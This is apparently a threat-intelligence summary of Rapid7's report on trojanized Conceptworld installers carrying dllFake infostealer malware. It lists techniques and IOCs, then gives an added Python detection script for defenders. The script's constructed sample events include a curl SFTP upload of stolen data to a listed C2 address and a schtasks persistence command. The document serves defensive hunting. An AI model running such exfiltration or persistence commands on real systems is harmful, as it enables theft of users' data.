Supply Chain Compromise Results in Trojanized Installers for Notezilla, RecentX, Copywhiz

Rapid7 investigated trojanized installers for Notezilla, RecentX, and Copywhiz distributed via Conceptworld, uncovering information-stealing malware that can download and execute additional payloads. The malware persists via a scheduled task and exfiltrates data while covertly running in the background. #Notezilla #dllFake

Key points

  • Rapid7 found trojanized Notezilla, RecentX, and Copywhiz installers hosted on Conceptworld’s site, delivering information-stealing malware and extra payloads.
  • The compromised installers were unsigned and mismatched in file size, indicating tampering with legitimate packages.
  • The dllFake malware family collects browser credentials and cryptocurrency wallet data, logs clipboard contents and keystrokes, and can download and execute additional payloads.
  • Initial access was a supply-chain compromise: the threat actor gained control of Conceptworld’s official download domain, conceptworld[.]com, and replaced the legitimate installers served from it.
  • Attack chain involves unpacking the installer, dropping staging files in AppData/Temp, and creating a hidden scheduled task to run the main payload every three hours.
  • Batch scripts and Windows API calls (ShellExecuteA) stage and launch the legitimate installer so the user sees a normal installation, while the malicious components run in the background.
  • Defensive guidance: verify installer integrity (hash, file size) and digital signatures before running a download, and re-image affected systems; detections cover scheduled-task persistence created via SchTasks and SFTP-based exfiltration.

MITRE Techniques

  • [T1584.004] Compromise Infrastructure – The threat actor gained access to the official domain responsible for serving software downloads. “The threat actor gained access to the official domain responsible for serving software downloads.”
  • [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – The threat actor trojanized copies of the legitimate installers being served on the official website, to execute malware. “trojanized copies of the legitimate installers being served on the official website, to execute malware.”
  • [T1204.002] User Execution: Malicious File – Users are tricked into executing the malicious installer as it is served from the official website. “Users are tricked into executing the malicious installer as it is served from the official website.”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Much of the malware’s functionality is facilitated through batch script files. “Much of the malware’s functionality is facilitated through batch script files.”
  • [T1059.006] Command and Scripting Interpreter: Python – Several second stage payloads were created using PyInstaller. “Several second stage payloads were created using PyInstaller.”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Initial execution of the primary batch script is delayed by at least 3 hours by the creation of a scheduled task. “Initial execution of the primary batch script is delayed by at least 3 hours by the creation of a scheduled task.”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – The malware is executed every 3 hours and will persist through reboots. “The malware is executed every 3 hours and will persist through reboots.”
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – The malware decrypts and dumps credentials from Google Chrome and Mozilla Firefox. “The malware decrypts and dumps credentials from Google Chrome and Mozilla Firefox.”
  • [T1560.001] Archive Collected Data: Archive via Utility – Stolen data is archived via 7z.exe. “Stolen data is archived via 7z.exe.”
  • [T1115] Clipboard Data – A second stage malware payload dumps all clipboard data to disk. “Clipboard data”
  • [T1005] Data from Local System – The malware compresses and steals files according to a file extension list and directory path strings blacklist. “compresses and steals files according to a file extension list and directory path strings blacklist.”
  • [T1056.001] Input Capture: Keylogging – A second stage malware payload logs keystrokes to disk. “logs keystrokes to disk.”
  • [T1571] Non-Standard Port – The threat actor uses port 2265 for SFTP instead of the default port 22. “uses port 2265 for SFTP instead of the default: 22.”
  • [T1048] Exfiltration Over Alternative Protocol – The malware uploads stolen data to C2 servers using SFTP via curl. “uploads stolen data to C2 servers using SFTP via curl.”

Indicators of Compromise

  • [Domain/URL] conceptworld[.]com – The official domain that was serving malicious installers.
  • [Network] 5.180.185[.]42 – C2 IPv4 address hosting an SFTP server.
  • [Network] 212.70.149[.]210 – C2 IPv4 address hosting an SFTP server.
  • [Network] 50.2.108[.]102 – C2 IPv4 address hosting an SFTP server.
  • [Host-Based] NotezillaSetup.exe – Trojanized installer package. SHA-256: 6F49756749D175058F15D5F3C80C8A7D46E80EC3E5EB9FB31F4346ABDB72A0E7
  • [Host-Based] NotezillaSetup32.exe – Trojanized installer package. SHA-256: BFA99C41AECC814DE5B9EB8397A27E516C8B0A4E31EDD9ED1304DA6C996B4AAA
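The following is an added example, not Rapid7’s code or detection rules, showing how the behaviours in the technique list and the IOCs above translate into hunting logic over process-creation events: a `schtasks /create` that launches a batch script from AppData/Temp on a three-hour cadence (T1053.005), a `curl` SFTP transfer to one of the listed C2 addresses or on a port other than 22 (T1048, T1571), and an image whose SHA-256 matches a trojanized installer. The report does not reproduce the actual command lines, so the sample events, the task name “SysCheck”, the user name, the credentials and the file names are constructed for illustration.

```python
"""Hunt for dllFake-style persistence and exfiltration in process-creation events.
Added example modelled on the behaviours summarised in the report; the sample
events, task name, user name and credentials below are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# SHA-256 hashes of the trojanized installers from the IOC list (lower-cased for lookup).
KNOWN_BAD_SHA256 = {
    "6f49756749d175058f15d5f3c80c8a7d46e80ec3e5eb9fb31f4346abdb72a0e7": "NotezillaSetup.exe",
    "bfa99c41aecc814de5b9eb8397a27e516c8b0a4e31edd9ed1304da6c996b4aaa": "NotezillaSetup32.exe",
}
C2_SFTP_HOSTS = {"5.180.185.42", "212.70.149.210", "50.2.108.102"}
SFTP_DEFAULT_PORT = 22
SUSPICIOUS_INTERVAL_MINUTES = 180  # the three-hour cadence described in the report
STAGING_DIR_RE = re.compile(r"\\AppData\\|\\Temp\\", re.IGNORECASE)
SFTP_URL_RE = re.compile(r"sftp://[^\s\"']+", re.IGNORECASE)

@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str
    sha256: str = ""    # image hash, if the log source records one

def _arg_value(cmd, flag):
    """Value following a schtasks flag such as /tr or /mo, with surrounding quotes stripped."""
    m = re.search(rf'(?:^|\s){re.escape(flag)}\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def task_interval_minutes(cmd):
    """Repetition interval of a `schtasks /create` command in minutes, or None if not periodic."""
    schedule = (_arg_value(cmd, "/sc") or "").lower()
    modifier = _arg_value(cmd, "/mo")
    if modifier is None or not modifier.isdigit():
        return None
    if schedule == "minute":
        return int(modifier)
    if schedule == "hourly":
        return int(modifier) * 60
    return None

def check_scheduled_task(ev):
    """T1053.005: task action is a batch script in a staging directory, or repeats every 3 hours."""
    findings = []
    if not ev.image.lower().endswith("schtasks.exe") or not re.search(r"/create\b", ev.command_line, re.I):
        return findings
    action = _arg_value(ev.command_line, "/tr") or ""
    if STAGING_DIR_RE.search(action) and action.lower().endswith(".bat"):
        findings.append(f"scheduled task runs batch script from staging dir: {action}")
    if task_interval_minutes(ev.command_line) == SUSPICIOUS_INTERVAL_MINUTES:
        findings.append("scheduled task repeats on a 3-hour cadence")
    return findings

def check_sftp_exfil(ev):
    """T1048 / T1571: curl SFTP transfer to a known C2 host or on a non-standard port."""
    findings = []
    if not ev.image.lower().endswith("curl.exe"):
        return findings
    for url in SFTP_URL_RE.findall(ev.command_line):
        parsed = urlparse(url)  # sftp:// gets a netloc, so hostname/port parse normally
        host, port = parsed.hostname, parsed.port or SFTP_DEFAULT_PORT
        if host in C2_SFTP_HOSTS:
            findings.append(f"curl SFTP transfer to known C2 host {host}")
        if port != SFTP_DEFAULT_PORT:
            findings.append(f"curl SFTP on non-standard port {port}")
    return findings

def check_known_bad_hash(ev):
    """Image hash matches one of the trojanized installers from the IOC list."""
    name = KNOWN_BAD_SHA256.get(ev.sha256.lower())
    return [f"image matches trojanized installer hash ({name})"] if name else []

def scan(events):
    """Return (image, findings) for every event that trips at least one check."""
    results = []
    for ev in events:
        findings = check_scheduled_task(ev) + check_sftp_exfil(ev) + check_known_bad_hash(ev)
        if findings:
            results.append((ev.image, findings))
    return results

# Constructed sample events (not from the report): persistence, exfiltration, a benign task,
# a download with a known-bad hash, and a benign curl.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /tn "SysCheck" /sc minute /mo 180 /tr "C:\Users\alice\AppData\Local\Temp\run.bat" /f'),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"curl.exe -k -u upload:pass -T C:\Users\alice\AppData\Local\Temp\out.7z sftp://5.180.185.42:2265/in/"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /tn "NightlyBackup" /sc daily /st 02:00 /tr "C:\Program Files\Backup\backup.exe"'),
    ProcessEvent(r"C:\Users\alice\Downloads\NotezillaSetup.exe", "NotezillaSetup.exe",
                 sha256="6F49756749D175058F15D5F3C80C8A7D46E80EC3E5EB9FB31F4346ABDB72A0E7"),
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe -sL https://example.com/ -o page.html"),
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image)
        for finding in findings:
            print("   ", finding)
```

Against the sample set the first two events and the known-bad download are reported and the two benign events are not. The interval check converts `/sc hourly /mo 3` and `/sc minute /mo 180` to the same 180 minutes, since either spelling produces the cadence the report describes; the hash check is only as good as the log source’s hashing, so pair it with the size and signature checks from the guidance above when triaging a download by hand.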

Read more: https://blog.rapid7.com/2024/06/27/supply-chain-compromise-leads-to-trojanized-installers-for-notezilla-recentx-copywhiz/